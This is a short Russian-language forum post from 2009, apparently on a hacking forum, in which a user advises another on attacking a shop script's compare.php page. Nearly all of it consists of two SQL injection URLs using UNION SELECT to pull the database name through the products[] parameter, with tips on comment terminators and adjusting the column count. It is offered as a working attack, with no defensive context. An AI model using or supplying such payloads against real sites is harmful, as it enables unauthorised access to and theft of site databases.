13.05.2009, 11:18
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
попробуй делать
Код:
site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/*
или в конце +-- или %23
или
Код:
site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+products as p, products_description as pd WHERE p.products_id+IN(1
Ну и естественно там не обязательно 6 столбцов. |
|
|